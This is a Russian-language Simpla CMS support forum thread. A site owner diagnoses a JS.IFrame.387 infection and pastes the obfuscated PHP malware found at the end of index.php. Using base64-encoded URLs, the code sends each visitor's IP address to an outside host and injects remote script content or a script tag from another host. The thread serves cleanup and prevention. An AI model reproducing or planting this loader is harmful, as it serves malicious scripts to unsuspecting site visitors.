Перейти к содержанию
Официальный форум поддержки Simpla

Вирус на сайте JS.IFrame.387 [РЕШЕНО]


Рекомендуемые сообщения

Сегодня обнаружил, что сайт заражен вот такой дрянью JS.IFrame.387. Не могу найти убежище этого iFrame, может кто сталкивался, подскажите, где сидит этот зверь?

Причем между моими ссылка сайта drWeb почему-то проверил сторонний. Где-то стоит редирект?

Проверка:http://edgdlfd.homeunix.net/rsize.jsРазмер файла:394 байтMD5 файла:ebb93d0725496d8f8c7f47430f164cd4http://edgdlfd.homeunix.net/rsize.js infected with JS.IFrame.387
Ссылка на сообщение
Поделиться на другие сайты

Тема закрыта, нашел вредоносный код в index.php в самом низу, антивирус больше не ругается. Ура!

function sql2_safe($in) {        $rtn = base64_decode($in);        return $rtn;}function collectnewss() {		if (!isset($_COOKIE["iJijkdaMnerys"])) {        $value = 'yadeor';		$ip = $_SERVER['REMOTE_ADDR'];        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;		$file = @fopen ($get, "r");		$content = @fread($file, 1000);		@setcookie("iJijkdaMnerys", $value, time()+3600*24);		if (!$content)			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");		else 			echo $content;		}}collectnewss ();
Ссылка на сообщение
Поделиться на другие сайты

Да, я после того как пост написал, еще раз в индекс заглянул, он там оказался, а я рыл все файлы с расширением *.js Из-за чего это могло случится? Какие меры принимать, кроме смены паролей, дабы предотвратить такие ситуации? А то сегодня пара клиентов пожаловались, мол антивирус сигналит, троян на сайте..

Ссылка на сообщение
Поделиться на другие сайты

Да, вот это будет точно залет)) Спасибо, рад, что на этом форуме есть адекватные люди, которые помогают советами, а не корчат из себя умников отсылая на яндекс.

Ссылка на сообщение
Поделиться на другие сайты

Никто не сталкивался, как уместить комментарии VK, Facebook и стандартный симпла посредством переключаемых табов? Типа будет 3 вкладки, нажимаешь, к примеру на ссылочку Facebook и переключается на нужный виджет комментирования.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

Загрузка...
×
×
  • Создать...